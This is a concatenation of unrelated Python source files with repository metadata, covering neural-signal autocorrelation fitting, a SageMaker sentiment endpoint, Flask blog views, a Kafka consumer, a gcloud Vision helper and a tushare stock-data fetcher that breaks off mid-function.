ax.set_xlabel('Time (ms)')
#########################################################################
### Autocorrelation calculation, plots and exponential fits #############
#########################################################################
## ACF of the ROIs are stacked as columns of numpy array
import statsmodels.api as sm
from statsmodels.tsa.stattools import acf # For autocorrelation
from scipy.optimize import curve_fit # For exponential curve fitting
# Single exponential fit
def monoExp(x, tau):
    """Single-term exponential decay exp(-tau * x), fitted to the ACF curves."""
    return np.exp(-x * tau)
# Compute the ACF of each area's rate series, plot all ACFs, and fit a
# single-exponential decay to estimate each area's timescale (tau).
_ = plt.figure(figsize=(10,8))
nl=1000 # Lag index for autocorrelation
ACF=np.zeros((nl,p['n_area']))
m=np.zeros(p['n_area'])
Tau_esti=np.zeros(p['n_area'])
cols=['r','g','b','k'] # Colors for the plot (cycled when n_area > 4)
para=(30) # Initial value for optimization
for k in range(p['n_area']):
    ACF[:,k]=acf(r_exc[:,k], nlags=nl-1)
    # Bug fix: cols has only 4 entries but there are 29 areas; cycle the
    # colors instead of raising IndexError at k == 4.
    plt.plot(np.arange(nl)*dt,ACF[:,k],cols[k % len(cols)],label=p['areas'][k])
    # Curve fitting
    params,_ = curve_fit(monoExp, np.arange(nl)*dt,ACF[:,k],para)
    #m[k]=params[0]
    Tau_esti[k]=params[0]
plt.legend()
plt.xlim(np.array([0, nl])*dt)
plt.title("Autocorrelation of rate changes at different regions",size=20)
plt.xlabel("Lags (msec)",size=14)
plt.ylabel("Normalized Autocorrelation",size=14)
_ = plt.figure(figsize=(12,10))
for k in range(p['n_area']):
    # Bug fix: int(str(22)+str(k+1)) only addresses a 2x2 grid and is invalid
    # for k >= 4; use an explicit 6x5 grid that fits all 29 areas.
    plt.subplot(6, 5, k+1)
    plt.plot(np.arange(nl)*dt,ACF[:,k],label="ACF data")
    plt.plot(np.arange(nl)*dt,
             monoExp(np.arange(nl)*dt,Tau_esti[k]),
             '--', label="fitted")
    plt.title(p['areas'][k] + "-- Esti. Tau: "+
              str(round(1/Tau_esti[k],2)) + " msec" ,size=20)
"""
################ Creation of BOLD resting state from the neural signals #####
# Hemodynamic function
def Hemodynamic(n,TR,tauh=1.25*1e3,d=2.25*1e3):
# f=[]
# for k in range(n):
# f.append((((k*TR)-d)*np.exp(((k*TR)-d)/tauh))/tauh**2)
return [(((k*TR)-d)*np.exp(-((k*TR)-d)/tauh))/tauh**2 for k in range(n) if k!=0]
plt.plot(Hemodynamic(100,2))
############ COMPUTATION OF functional connectivity matrix ############
# def AUTOcorr(x,lags=10):
# M =len(x)
# r =np.zeros(M) # One-sided autocorrelation
# for i in range(M):
# r[i]=(1/(M-i))*(sum(x[0:(M-i)] * x[i:M])) # Dot product in r
# return(r[0:(lags+1)])
# lgs=1000
# AC1= AUTOcorr(r_exc[:,0],lgs)
# AC2=AUTOcorr(r_exc[:,1],lgs)
# plt.plot(AC1)
# plt.plot(AC2/max(AC2))
# plt.show()
# lgs=1000
# autocorrelation = np.correlate(r_exc[:,0], r_exc[:,0], mode="full")
# sm.graphics.tsa.plot_acf(r_exc[:,0], lags=lgs)
# sm.graphics.tsa.plot_acf(r_exc[:,1], lags=lgs)
# sm.graphics.tsa.plot_acf(r_exc[:,2], lags=lgs)
#import matplotlib
#matplotlib.pyplot.xcorr(r_exc[:,1], r_exc[:,1], normed=True, maxlags=1000)
# plt.plot(np.arange(nl)*dt,acf(r_exc[:,0], nlags=nl-1),'r',label=p['areas'][0])
# plt.plot(np.arange(nl)*dt,acf(r_exc[:,1], nlags=nl-1),'g',label=p['areas'][1])
# plt.plot(np.arange(nl)*dt,acf(r_exc[:,2], nlags=nl-1),'b',label=p['areas'][2])
# plt.plot(np.arange(nl)*dt,acf(r_exc[:,3], nlags=nl-1),'k',label=p['areas'][3])
# plt.legend()
# plt.xlim(np.array([0, nl])*dt)
# plt.title("Autocorrelation of rate changes at different regions",size=20)
#plt.ylim([0,1.1])
"""
| [
"j.olivermount@gmail.com"
] | j.olivermount@gmail.com |
00e434dbbfdc3a5a3c273251e6fcb2d07db1ba31 | 881c5baa69c6d43b05e56ce439c6c373b01644c9 | /serve/predict.py | 7b1e3dcb90e8f854304c3270120a2960faee637b | [
"MIT"
] | permissive | nitingupta180/sentiment-analysis | 8fff2988d16a70c76923227d464ad76b78aebe91 | 8d9ef710259f73d1a333560dd2a03fb7868c5ca3 | refs/heads/main | 2023-02-02T05:05:37.434928 | 2020-12-19T08:25:37 | 2020-12-19T08:25:37 | 322,539,148 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,147 | py | import argparse
import json
import os
import pickle
import sys
import sagemaker_containers
import pandas as pd
import numpy as np
import torch
import torch.nn as nn
import torch.optim as optim
import torch.utils.data
from model import LSTMClassifier
from utils import review_to_words, convert_and_pad
def model_fn(model_dir):
    """Load the PyTorch model from the `model_dir` directory.

    SageMaker inference hook: reconstructs the LSTMClassifier from the saved
    hyperparameters, loads its weights and vocabulary, and returns it in
    eval mode on the available device.
    """
    print("Loading model.")
    # First, load the parameters used to create the model.
    model_info = {}
    model_info_path = os.path.join(model_dir, 'model_info.pth')
    with open(model_info_path, 'rb') as f:
        model_info = torch.load(f)
    print("model_info: {}".format(model_info))
    # Determine the device and construct the model.
    device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
    model = LSTMClassifier(model_info['embedding_dim'], model_info['hidden_dim'], model_info['vocab_size'])
    # Load the store model parameters.
    # NOTE(review): torch.load uses the default device mapping; if the
    # checkpoint was saved on GPU and this host is CPU-only, a map_location
    # argument would be needed — confirm the deployment target.
    model_path = os.path.join(model_dir, 'model.pth')
    with open(model_path, 'rb') as f:
        model.load_state_dict(torch.load(f))
    # Load the saved word_dict (token -> integer id vocabulary).
    word_dict_path = os.path.join(model_dir, 'word_dict.pkl')
    with open(word_dict_path, 'rb') as f:
        model.word_dict = pickle.load(f)
    model.to(device).eval()
    print("Done loading model.")
    return model
def input_fn(serialized_input_data, content_type):
    """Deserialize the request body; only 'text/plain' (UTF-8) is supported."""
    print('Deserializing the input data.')
    if content_type != 'text/plain':
        raise Exception('Requested unsupported ContentType in content_type: ' + content_type)
    return serialized_input_data.decode('utf-8')
def output_fn(prediction_output, accept):
    """Serialize the model prediction for the response.

    The *accept* header is ignored; the value is rendered with str().
    """
    print('Serializing the generated output.')
    serialized = str(prediction_output)
    return serialized
def predict_fn(input_data, model):
    """Run sentiment inference on a raw review string.

    Args:
        input_data: the raw review text (str).
        model: the LSTMClassifier returned by model_fn, with word_dict set.

    Returns:
        A numpy array holding a single rounded score (0 or 1).
    """
    print('Inferring sentiment of input data.')
    device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
    if model.word_dict is None:
        raise Exception('Model has not been loaded properly, no word_dict.')
    # Convert the raw review to the training-time representation:
    # data_X - a sequence of length 500 which represents the converted review
    # data_len - the length of the review
    input_data_to_words = review_to_words(input_data)
    data_X, data_len = convert_and_pad(model.word_dict, input_data_to_words)
    # The model expects input rows of the form 'len, review[500]'.
    data_pack = np.hstack((data_len, data_X))
    data_pack = data_pack.reshape(1, -1)
    data = torch.from_numpy(data_pack)
    data = data.to(device)
    # Make sure to put the model into evaluation mode
    model.eval()
    with torch.no_grad():
        output = model.forward(data)
    # Bug fix: Tensor.numpy() raises a TypeError for CUDA tensors; move the
    # output to the CPU before converting.
    result = np.round(output.cpu().numpy())
    return result
| [
"noreply@github.com"
] | nitingupta180.noreply@github.com |
4bfc954d67403dfc2b0f37cb258ad7d0fa939d04 | 0975a61b8b6d416892541f8d57425b7959418127 | /011兔子生兔子.py | 624e091deb7280202630e34bdab22e588eabaef8 | [] | no_license | minisstep/Runoob | 91757ebafba1b26964626ddc8a5dc67b0819c951 | 9aaf8a2b309e360d50192aa748ca2edfb9ec44e0 | refs/heads/master | 2020-04-24T18:05:06.717245 | 2017-06-10T22:49:22 | 2017-06-10T22:49:22 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 435 | py | # -*- encoding: utf-8 -*-
__author__ = 'xgj1010'
__date__ = '2017/6/1 14:34'
"""
题目:古典问题:有一对兔子,从出生后第3个月起每个月都生一对兔子,小兔子长到第三个月后每个月又生一对兔子,假如兔子都不死,问每个月的兔子总数为多少?
程序分析:兔子的规律为数列1,1,2,3,5,8,13,21....
"""
a = 1
b = 1
for i in range(1, 22):
a, b = b, a+b
print b
| [
"869624090@qq.com"
] | 869624090@qq.com |
7fe354c98d8d01ba22505c5e5c51b733782f34d6 | a3cc7286d4a319cb76f3a44a593c4a18e5ddc104 | /lib/googlecloudsdk/api_lib/ml/vision/util.py | d48320c61c682ef73501c2c44fe8ff497a756db5 | [
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0"
] | permissive | jordanistan/Google-Cloud-SDK | f2c6bb7abc2f33b9dfaec5de792aa1be91154099 | 42b9d7914c36a30d1e4b84ae2925df7edeca9962 | refs/heads/master | 2023-09-01T01:24:53.495537 | 2023-08-22T01:12:23 | 2023-08-22T01:12:23 | 127,072,491 | 0 | 1 | NOASSERTION | 2023-08-22T01:12:24 | 2018-03-28T02:31:19 | Python | UTF-8 | Python | false | false | 2,070 | py | # Copyright 2017 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Utilities for gcloud ml vision commands."""
import os
import re
from googlecloudsdk.api_lib.util import apis
from googlecloudsdk.core import exceptions
# Cloud Vision API identifier and version used for message-module lookup.
VISION_API = 'vision'
VISION_API_VERSION = 'v1'
# Remote image URIs must start with http://, https:// or gs://.
IMAGE_URI_FORMAT = r'^(https{,1}?|gs)://'
class Error(exceptions.Error):
  """Base error for gcloud ml vision commands."""
class ImagePathError(Error):
"""Error if an image path is improperly formatted."""
def GetImageFromPath(path):
"""Builds an Image message from a path.
Args:
path: the path arg given to the command.
Raises:
ImagePathError: if the image path does not exist and does not seem to be
a remote URI.
Returns:
vision_v1_messages.Image: an image message containing information for the
API on the image to analyze.
"""
messages = apis.GetMessagesModule(VISION_API, VISION_API_VERSION)
image = messages.Image()
if os.path.isfile(path):
with open(path, 'rb') as content_file:
image.content = content_file.read()
elif re.match(IMAGE_URI_FORMAT, path):
image.source = messages.ImageSource(imageUri=path)
else:
raise ImagePathError(
'The image path does not exist locally or is not properly formatted. '
'A URI for a remote image must be a Google Cloud Storage image URI, '
'which must be in the form `gs://bucket_name/object_name`, or a '
'publicly accessible image HTTP/HTTPS URL. Please double-check your '
'input and try again.')
return image
| [
"jordan.robison@gmail.com"
] | jordan.robison@gmail.com |
41ba002d0b21ec0578f9bb7ef6d86ce45f0e7959 | b3b93c7db04c60c42fc4db58f1731a33a14fd621 | /python_oop/product/product.py | f73922c8449f0b60e9e6e82f2fa7bee0ed570326 | [] | no_license | scottcdudley/python_stack | 97d6d90179c26cc59cf926c5dcf45a6e99a918e0 | ac3c6fdedc19711a65d8467b65c96a3938e9c2a1 | refs/heads/master | 2020-03-23T20:31:22.410044 | 2018-07-23T17:24:15 | 2018-07-23T17:24:15 | 142,043,990 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,296 | py | class Product(object):
def __init__(self, price, item_name, weight, brand):
self.price = price
self.item_name = item_name
self.weight = weight
self.brand = brand
self.status = "for sale"
self.display_info()
def sell(self):
self.status = "sold"
return self
def add_tax(self, tax):
return self.price * (1 + tax)
def return_product(self, reason):
if reason.lower() == "defective":
self.price = 0
self.status = "Defective"
elif reason.lower() == "like new":
self.status = "for sale"
elif reason.lower() == "open":
self.status = "used"
self.price *= 0.8
return self
def display_info(self):
print "Item Name: {}".format(self.item_name)
print "Price: {}".format(self.price)
print "Weight: {}".format(self.weight)
print "Brand: {}".format(self.brand)
print "Status: {}".format(self.status)
return self
# Demo / manual test: exercise the Product lifecycle (Python 2 prints).
product1 = Product(200, 'Zune', '10oz', 'Microsoft')
print " "
print product1.add_tax(0.1)
print " "
product1.sell()
product1.display_info()
print " "
product1.return_product("defective")
product1.display_info()
print " "
product2 = Product(1000, "iPod", "1lb", "Apple")
print " "
print product2.add_tax(0.7)
print " "
product2.sell()
product2.display_info()
print " "
product2.return_product("open")
product2.display_info()
print " "
"scott.dudley@hotmail.com"
] | scott.dudley@hotmail.com |
b8b7d3f5077d58a59b998dd73967b10c99685258 | fddda95237f380caf022a84c7949e979dc62777f | /app/main/views.py | fc82df790404030af7a35ae1fa557963ef7a449b | [] | no_license | xxxxsk/learn_flask | 0caa6d919469ccf5c910b76c92e30ca3cf3823cf | 3279d70846255cceef78ffdc00025751ca28e6de | refs/heads/master | 2022-12-09T09:50:58.735108 | 2019-01-08T12:22:19 | 2019-01-08T12:22:19 | 161,746,831 | 0 | 0 | null | 2022-09-16T17:54:49 | 2018-12-14T07:17:53 | Python | UTF-8 | Python | false | false | 10,092 | py | from flask import render_template, redirect, url_for, abort, flash, request,\
current_app, make_response
from flask_login import login_required, current_user
from flask_sqlalchemy import get_debug_queries
from . import main
from .forms import EditProfileForm, EditProfileAdminForm, PostForm,\
CommentForm
from .. import db
from ..models import Permission, Role, User, Post, Comment
from ..decorators import admin_required, permission_required
@main.after_app_request
def after_request(response):
    """Log any DB query slower than FLASKY_SLOW_DB_QUERY_TIME, then return
    the response unchanged."""
    for query in get_debug_queries():
        if query.duration >= current_app.config['FLASKY_SLOW_DB_QUERY_TIME']:
            current_app.logger.warning(
                'Slow query: %s\nParameters: %s\nDuration: %fs\nContext: %s\n'
                % (query.statement, query.parameters, query.duration,
                   query.context))
    return response
@main.route('/shutdown')
def server_shutdown():
    """Stop the Werkzeug development server; only honored in testing mode."""
    if not current_app.testing:
        abort(404)
    shutdown = request.environ.get('werkzeug.server.shutdown')
    if not shutdown:
        abort(500)
    shutdown()
    return 'Shutting down...'
@main.route('/', methods=['GET', 'POST'])
def index():
    """Home page: post form plus a paginated feed (all posts or followed-only)."""
    form = PostForm()
    if current_user.can(Permission.WRITE) and form.validate_on_submit():
        post = Post(body=form.body.data,
                    author=current_user._get_current_object())
        db.session.add(post)
        db.session.commit()
        return redirect(url_for('.index'))
    page = request.args.get('page', 1, type=int)
    show_followed = False
    if current_user.is_authenticated:
        # The 'show_followed' cookie toggles between the full feed and the
        # followed-users feed (set by the show_all/show_followed views).
        show_followed = bool(request.cookies.get('show_followed', ''))
    if show_followed:
        query = current_user.followed_posts
    else:
        query = Post.query
    pagination = query.order_by(Post.timestamp.desc()).paginate(
        page, per_page=current_app.config['FLASKY_POSTS_PER_PAGE'],
        error_out=False)
    posts = pagination.items
    return render_template('index.html', form=form, posts=posts,
                           show_followed=show_followed, pagination=pagination)
@main.route('/user/<username>')
def user(username):
    """Profile page for *username* with that user's paginated posts (404 if unknown)."""
    user = User.query.filter_by(username=username).first_or_404()
    page = request.args.get('page', 1, type=int)
    pagination = user.posts.order_by(Post.timestamp.desc()).paginate(
        page, per_page=current_app.config['FLASKY_POSTS_PER_PAGE'],
        error_out=False)
    posts = pagination.items
    return render_template('user.html', user=user, posts=posts,
                           pagination=pagination)
@main.route('/edit-profile', methods=['GET', 'POST'])
@login_required
def edit_profile():
    """Let the logged-in user edit name, location and about-me."""
    form = EditProfileForm()
    if form.validate_on_submit():
        current_user.name = form.name.data
        current_user.location = form.location.data
        current_user.about_me = form.about_me.data
        db.session.add(current_user._get_current_object())
        db.session.commit()
        flash('Your profile has been updated.')
        return redirect(url_for('.user', username=current_user.username))
    # Pre-populate the form with current values on GET (or invalid POST).
    form.name.data = current_user.name
    form.location.data = current_user.location
    form.about_me.data = current_user.about_me
    return render_template('edit_profile.html', form=form)
@main.route('/edit-profile/<int:id>', methods=['GET', 'POST'])
@login_required
@admin_required
def edit_profile_admin(id):
    """Administrator-only editor for any user's full profile (email, username,
    confirmation status and role included)."""
    user = User.query.get_or_404(id)
    form = EditProfileAdminForm(user=user)
    if form.validate_on_submit():
        user.email = form.email.data
        user.username = form.username.data
        user.confirmed = form.confirmed.data
        user.role = Role.query.get(form.role.data)
        user.name = form.name.data
        user.location = form.location.data
        user.about_me = form.about_me.data
        db.session.add(user)
        db.session.commit()
        flash('The profile has been updated.')
        return redirect(url_for('.user', username=user.username))
    # Pre-populate the form with current values on GET (or invalid POST).
    form.email.data = user.email
    form.username.data = user.username
    form.confirmed.data = user.confirmed
    form.role.data = user.role_id
    form.name.data = user.name
    form.location.data = user.location
    form.about_me.data = user.about_me
    return render_template('edit_profile.html', form=form, user=user)
@main.route('/post/<int:id>', methods=['GET', 'POST'])
def post(id):
    """Single-post page with its comment form and paginated comments."""
    post = Post.query.get_or_404(id)
    form = CommentForm()
    if form.validate_on_submit():
        comment = Comment(body=form.body.data,
                          post=post,
                          author=current_user._get_current_object())
        db.session.add(comment)
        db.session.commit()
        flash('Your comment has been published.')
        return redirect(url_for('.post', id=post.id, page=-1))
    page = request.args.get('page', 1, type=int)
    if page == -1:
        # page == -1 means "last page": land on the newly published comment.
        page = (post.comments.count() - 1) // \
            current_app.config['FLASKY_COMMENTS_PER_PAGE'] + 1
    pagination = post.comments.order_by(Comment.timestamp.asc()).paginate(
        page, per_page=current_app.config['FLASKY_COMMENTS_PER_PAGE'],
        error_out=False)
    comments = pagination.items
    return render_template('post.html', posts=[post], form=form,
                           comments=comments, pagination=pagination)
@main.route('/edit/<int:id>', methods=['GET', 'POST'])
@login_required
def edit(id):
    """Edit an existing post; only its author or an administrator may."""
    post = Post.query.get_or_404(id)
    if current_user != post.author and \
            not current_user.can(Permission.ADMIN):
        abort(403)
    form = PostForm()
    if form.validate_on_submit():
        post.body = form.body.data
        db.session.add(post)
        db.session.commit()
        flash('The post has been updated.')
        return redirect(url_for('.post', id=post.id))
    form.body.data = post.body
    return render_template('edit_post.html', form=form)
@main.route('/follow/<username>')
@login_required
@permission_required(Permission.FOLLOW)
def follow(username):
    """Make the current user follow *username* (requires FOLLOW permission)."""
    user = User.query.filter_by(username=username).first()
    if user is None:
        flash('Invalid user.')
        return redirect(url_for('.index'))
    if current_user.is_following(user):
        flash('You are already following this user.')
        return redirect(url_for('.user', username=username))
    current_user.follow(user)
    db.session.commit()
    flash('You are now following %s.' % username)
    return redirect(url_for('.user', username=username))
@main.route('/unfollow/<username>')
@login_required
@permission_required(Permission.FOLLOW)
def unfollow(username):
    """Make the current user stop following *username*."""
    user = User.query.filter_by(username=username).first()
    if user is None:
        flash('Invalid user.')
        return redirect(url_for('.index'))
    if not current_user.is_following(user):
        flash('You are not following this user.')
        return redirect(url_for('.user', username=username))
    current_user.unfollow(user)
    db.session.commit()
    flash('You are not following %s anymore.' % username)
    return redirect(url_for('.user', username=username))
@main.route('/followers/<username>')
def followers(username):
    """Paginated list of the users who follow *username*."""
    user = User.query.filter_by(username=username).first()
    if user is None:
        flash('Invalid user.')
        return redirect(url_for('.index'))
    page = request.args.get('page', 1, type=int)
    pagination = user.followers.paginate(
        page, per_page=current_app.config['FLASKY_FOLLOWERS_PER_PAGE'],
        error_out=False)
    # Each entry pairs the follower with the time the follow happened.
    follows = [{'user': item.follower, 'timestamp': item.timestamp}
               for item in pagination.items]
    return render_template('followers.html', user=user, title="Followers of",
                           endpoint='.followers', pagination=pagination,
                           follows=follows)
@main.route('/followed_by/<username>')
def followed_by(username):
    """Paginated list of the users that *username* follows."""
    user = User.query.filter_by(username=username).first()
    if user is None:
        flash('Invalid user.')
        return redirect(url_for('.index'))
    page = request.args.get('page', 1, type=int)
    pagination = user.followed.paginate(
        page, per_page=current_app.config['FLASKY_FOLLOWERS_PER_PAGE'],
        error_out=False)
    # Each entry pairs the followed user with the time the follow happened.
    follows = [{'user': item.followed, 'timestamp': item.timestamp}
               for item in pagination.items]
    return render_template('followers.html', user=user, title="Followed by",
                           endpoint='.followed_by', pagination=pagination,
                           follows=follows)
@main.route('/all')
@login_required
def show_all():
    """Switch the home feed to show every post (clears the cookie flag)."""
    thirty_days = 30 * 24 * 60 * 60
    response = make_response(redirect(url_for('.index')))
    response.set_cookie('show_followed', '', max_age=thirty_days)
    return response
@main.route('/followed')
@login_required
def show_followed():
    """Switch the home feed to followed-users-only (sets the cookie flag)."""
    thirty_days = 30 * 24 * 60 * 60
    response = make_response(redirect(url_for('.index')))
    response.set_cookie('show_followed', '1', max_age=thirty_days)
    return response
@main.route('/moderate')
@login_required
@permission_required(Permission.MODERATE)
def moderate():
    """Comment-moderation dashboard: newest comments first, paginated."""
    page = request.args.get('page', 1, type=int)
    pagination = Comment.query.order_by(Comment.timestamp.desc()).paginate(
        page, per_page=current_app.config['FLASKY_COMMENTS_PER_PAGE'],
        error_out=False)
    comments = pagination.items
    return render_template('moderate.html', comments=comments,
                           pagination=pagination, page=page)
@main.route('/moderate/enable/<int:id>')
@login_required
@permission_required(Permission.MODERATE)
def moderate_enable(id):
    """Clear a comment's disabled flag, then go back to the moderation list."""
    comment = Comment.query.get_or_404(id)
    comment.disabled = False
    db.session.add(comment)
    db.session.commit()
    page = request.args.get('page', 1, type=int)
    return redirect(url_for('.moderate', page=page))
@main.route('/moderate/disable/<int:id>')
@login_required
@permission_required(Permission.MODERATE)
def moderate_disable(id):
    """Set a comment's disabled flag, then go back to the moderation list."""
    comment = Comment.query.get_or_404(id)
    comment.disabled = True
    db.session.add(comment)
    db.session.commit()
    page = request.args.get('page', 1, type=int)
    return redirect(url_for('.moderate', page=page))
| [
"1306237818@qq.com"
] | 1306237818@qq.com |
14dfa0a6647e1c79cd33c076529270c16b054056 | 09933dafbbc12fe20c405362850ffbf315b01a58 | /src-tag-ent/gen_data.py | fbddab6277c97047553db17485a2206acc0a6875 | [] | no_license | johndpope/advrelation | 1ce1fd4ffc0b7abbea2762c3a8941b469c4f7cf5 | bc77dcfa8669d612aded6a053fff6766798bed14 | refs/heads/master | 2020-03-22T22:55:48.664711 | 2018-03-03T04:43:11 | 2018-03-03T04:43:11 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,447 | py | import tensorflow as tf
import config as config_lib
from inputs import dataset, semeval_v2
tf.logging.set_verbosity(tf.logging.INFO)
config = config_lib.get_config()
semeval_text = semeval_v2.SemEvalCleanedTextData(
config.semeval_dir, config.semeval_train_file, config.semeval_test_file)
# length statistics
semeval_text.length_statistics()
# gen vocab
vocab = dataset.Vocab(config.out_dir, config.vocab_file)
# vocab.generate_vocab(semeval_text.tokens())
# # trim embedding
# embed = dataset.Embed(config.out_dir, config.trimmed_embed300_file, config.vocab_file)
# google_embed = dataset.Embed(config.pretrain_embed_dir,
# config.google_embed300_file, config.google_words_file)
# embed.trim_pretrain_embedding(google_embed)
# build SemEval record data
semeval_text.set_vocab(vocab)
tag_encoder = dataset.Label(config.semeval_dir, config.semeval_tags_file)
semeval_text.set_tags_encoder(tag_encoder)
semeval_record = semeval_v2.SemEvalCleanedRecordData(semeval_text,
config.out_dir, config.semeval_train_record, config.semeval_test_record)
semeval_record.generate_data()
# INFO:tensorflow:(percent, quantile) [(50, 18.0), (70, 22.0), (80, 25.0),
# (90, 29.0), (95, 34.0), (98, 40.0), (100, 97.0)]
# INFO:tensorflow:generate vocab to data/generated/vocab.txt
# INFO:tensorflow:trim embedding to data/generated/embed300.trim.npy
# INFO:tensorflow:generate TFRecord data
| [
"lzh00776@163.com"
] | lzh00776@163.com |
671509fb4a1c6376bd546e9658ab0498782e94ab | bece006a37d0041d36416bc888afc96db4046f87 | /BACK/CYBEROPS-master/KAFKA/main_consumer_emotion.py | 4c5685945dfabb36fe9e260c2a52ee72b2e4dc45 | [] | no_license | acorredera/CyberOps | fdd8bca69db1ae98ce4cf36e010286e07972754b | 14f1a8a9c09864af5d84094ae8f8c2f41124d8c4 | refs/heads/master | 2023-03-18T05:16:41.961552 | 2022-09-27T05:07:46 | 2022-09-27T05:07:46 | 134,832,725 | 0 | 1 | null | 2023-03-03T00:49:14 | 2018-05-25T09:10:33 | Jupyter Notebook | UTF-8 | Python | false | false | 872 | py | import os
import sys
sys.path.append(os.path.join(os.path.dirname(__file__), '..'))
import NewsCore.dao.EmployeeDAOImpl as dao
import KAFKA.Consumer as consumer
import settings as settings
if __name__ == "__main__":
    # Runtime configuration: Cassandra endpoint/keyspace and the Kafka topic
    # whose messages carry the 'emotion' field to persist.
    ip_DCOS_cassandra = settings.ip_DCOS_cassandra
    keyspace = settings.keyspace_cassandra
    topic = 'cyberops_emotion'
    field2Extract = "emotion"
    # Load the Cassandra session and create the table (if needed).
    daoStatus = dao.EmployeeDAOImpl()
    daoStatus.createsession(ip_DCOS_cassandra)
    daoStatus.setlogger()
    daoStatus.loadkeyspace(keyspace)
    daoStatus.create_table() #only if table is not created previously
    # Run the blocking consumer loop for emotion messages.
    consumer_emotion = consumer.Consumer(topic=topic, field2Extract=field2Extract, DAO=daoStatus, ip_kafka_DCOS=settings.ip_kafka_DCOS)
    consumer_emotion.run()
"noreply@github.com"
] | acorredera.noreply@github.com |
c53c1612861b020945bf712d8bad9215e5e30760 | 8b2b3f9e706a13caeae1c58eaf9c8421cb7155e0 | /Source/FetchData/Fetch_Data_Stock_CHN_Daily.py | 20696a43119f5f91a09aa99a355d3f8610ccddd3 | [
"MIT"
] | permissive | hyy1101/StockRecommendSystem | 809ce2c001c0df395cc2953bf3a2e6254a591c02 | 188dd006d23a0280106a79895885ad4f9acb4cea | refs/heads/master | 2020-12-02T16:15:19.536621 | 2017-07-07T03:29:21 | 2017-07-07T03:29:21 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,916 | py | import sys, os, time, datetime, requests, warnings, configparser
import pandas as pd
import numpy as np
import tushare as ts
import concurrent.futures
from tqdm import tqdm
cur_path = os.path.dirname(os.path.abspath(__file__))
for _ in range(2):
root_path = cur_path[0:cur_path.rfind('/', 0, len(cur_path))]
cur_path = root_path
sys.path.append(root_path + "/" + 'Source/DataBase/')
from DB_API import queryStock, storeStock, queryStockList, storeStockList, queryStockPublishDay, storePublishDay
def getStocksList(root_path):
try:
df = queryStockList(root_path, "DB_STOCK", "SHEET_CHN_DAILY")
df.index = df.index.astype(str).str.zfill(6)
except Exception as e:
df = pd.DataFrame()
if df.empty == False: return df
stock_info = ts.get_stock_basics()
listData = pd.DataFrame(stock_info)
#listData.index.name = 'symbol'
#listData.index = listData.index.astype(str).str.zfill(6) #[str(symbol).zfill(6) for symbol in listData.index] #listData.index.astype(str).str.zfill(6)
#print(listData.index)
#listData['symbol'] = listData['symbol'].str.strip()
storeStockList(root_path, "DB_STOCK", "SHEET_CHN_DAILY", listData)
df = queryStockList(root_path, "DB_STOCK", "SHEET_CHN_DAILY")
df.index = df.index.astype(str).str.zfill(6)
return df
def getSingleStock(symbol):
repeat_times = 1
message = ""
df = pd.DataFrame()
for _ in range(repeat_times):
try:
data = ts.get_hist_data(symbol)
data.sort_index(ascending=True, inplace=True)
return data, ""
except Exception as e:
message = symbol + " fetch exception: " + str(e)
continue
return df, message
def getSingleStockByTime(symbol, from_date, till_date):
start = from_date.split('-')
start_y, start_m, start_d = start[0], start[1], start[2] # starting date
end = till_date.split('-')
end_y, end_m, end_d = end[0], end[1], end[2] # until now
repeat_times = 1
message = ""
df = pd.DataFrame()
for _ in range(repeat_times):
try:
data = ts.get_hist_data(symbol, from_date, till_date)
data.sort_index(ascending=True, inplace=True)
return data, ""
except Exception as e:
message = symbol + " fetch exception: " + str(e)
continue
return df, message
def judgeOpenDaysInRange(from_date, to_date):
holidays=["2017-01-01", "2017-01-02",
"2017-01-27", "2017-01-28", "2017-01-29", "2017-01-30", "2017-01-31", "2017-02-01", "2017-02-02",
"2017-04-02", "2017-04-03", "2017-04-04",
"2017-05-01",
"2017-05-28", "2017-05-29", "2017-05-30",
"2017-10-01", "2017-10-02", "2017-10-03", "2017-10-04", "2017-10-05","2017-10-06","2017-10-07","2017-10-08"]
#holidays = cal.holidays(from_date, to_date)
duedays = pd.bdate_range(from_date, to_date)
df = pd.DataFrame()
df['date'] = duedays
df['holiday'] = duedays.isin(holidays)
opendays = df[df['holiday'] == False]
return opendays
def judgeNeedPostDownload(from_date, to_date):
today = datetime.datetime.now()
start_date = pd.Timestamp(from_date)
end_date = pd.Timestamp(to_date)
if start_date > today: return False
if end_date > today: to_date = today.strftime("%Y-%m-%d")
dateList = judgeOpenDaysInRange(from_date, to_date)
if len(dateList) > 0: return True
return False
def updateSingleStockData(root_path, symbol, force_check):
startTime = time.time()
message = ""
if len(symbol) == 0: return startTime, message
till_date = (datetime.datetime.now()).strftime("%Y-%m-%d")
end_date = pd.Timestamp(till_date)
stockData, lastUpdateTime = queryStock(root_path, "DB_STOCK", "SHEET_CHN_DAILY", symbol)
if stockData.empty:
stockData, message = getSingleStock(symbol)
if stockData.empty == False:
storeStock(root_path, "DB_STOCK", "SHEET_CHN_DAILY", symbol, stockData)
return startTime, message
modified = False
first_date = pd.Timestamp(stockData.index[0])
last_date = pd.Timestamp(stockData.index[-1])
updateOnce = end_date > lastUpdateTime
if end_date > last_date and (updateOnce or force_check):
to_date = (last_date + datetime.timedelta(days=1)).strftime("%Y-%m-%d")
if judgeNeedPostDownload(to_date, till_date):
message = message + ", download post data from " + to_date + " to " + till_date
moreStockData, tempMessage = getSingleStockByTime(symbol, to_date, till_date)
message = message + tempMessage
if len(moreStockData) > 0:
if isinstance(moreStockData.index, pd.DatetimeIndex):
moreStockData.index = moreStockData.index.strftime("%Y-%m-%d")
modified = True
stockData = pd.concat([stockData, moreStockData])
stockData.index.name = 'date'
if modified:
stockData = stockData[~stockData.index.duplicated(keep='first')]
storeStock(root_path, "DB_STOCK", "SHEET_CHN_DAILY", symbol, stockData)
elif updateOnce:
